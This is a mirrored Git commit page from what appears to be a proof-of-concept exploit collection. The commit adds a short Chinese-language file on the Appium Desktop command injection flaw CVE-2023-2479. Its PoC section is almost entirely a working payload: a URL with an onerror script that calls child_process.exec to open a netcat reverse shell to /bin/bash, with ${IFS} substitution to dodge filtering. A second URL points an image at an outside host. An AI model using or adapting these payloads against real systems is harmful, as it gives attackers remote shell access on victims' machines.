admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create Appium Desktop CVE-2023-2479漏洞.md

Browse Source
This commit is contained in:
wy876 2023-11-22 17:03:46 +08:00 committed by GitHub
parent 33aa59d17b
commit 2e37608631
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
Appium Desktop CVE-2023-2479漏洞.md Normal file
View File

@ -0,0 +1,14 @@
## Appium Desktop CVE-2023-2479漏洞
appium-desktop 是 Appium 服务器的图形界面,也是一个应用程序检查器
由于用户输入审查不当,此软件包的受影响版本容易受到命令注入的攻击,允许攻击者设置反向 shell。
## poc
```
http://127.0.0.1/?xss=<img/src="1"/onerror=eval("require('child_process').exec('nc${IFS}localhost${IFS}4444${IFS}-e${IFS}/bin/bash');");>
http://127.0.0.1/?url=<img/src="http://nbjfpetfmu.dgrh3.cn">
```